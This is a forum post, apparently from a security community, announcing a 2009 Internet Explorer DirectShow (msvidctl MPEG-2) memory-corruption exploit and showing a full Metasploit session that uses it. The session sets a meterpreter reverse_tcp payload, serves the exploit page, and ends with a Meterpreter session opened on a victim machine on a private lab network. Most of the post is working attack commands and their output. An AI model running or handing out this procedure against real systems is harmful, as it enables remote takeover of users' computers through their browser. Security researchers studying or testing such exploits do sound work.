Originally Posted by Jabra
There is a new IE exploit that has been recently released into the wild. The exploit is for DirectShow (msvidctl.dll) MPEG-2. The exploit utilizes an ActiveX control in addition to a GIF file include, to perform a memory corruption attack. The vulnerability affects users of both IE 6 and IE7.
Today, the exploit was added to the Metasploit framework by HD Moore (the author of Metasploit). The module was written by Trancer which was posted at http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/.
Thus far, I have verified the exploit to be working on IE 7. Since the exploit works by using an ActiveX control, the victim will need to allow the ActiveX control to run.
=[ msf v3.3-dev
+ -- --=[ 384 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 162 aux
msf > use windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.50
LHOST => 192.168.1.50
msf exploit(msvidctl_mpeg2) > set LPORT 443
LPORT => 443
msf exploit(msvidctl_mpeg2) > set URIPATH /test.html
URIPATH => /test.html
msf exploit(msvidctl_mpeg2) > set SRVPORT 9000
SRVPORT => 9000
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:9000/test.html
[*] Local IP: http://192.168.1.50:9000/test.html
[*] Server started.
[*] Sending HTML to 192.168.1.100:1091…
[*] Sending exploit to 192.168.1.100:1091…
[*] Sending GIF to 192.168.1.100:1091…
[*] Transmitting intermediate stager for over-sized stage…(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (192.168.1.50:443 -> 192.168.1.100:1092)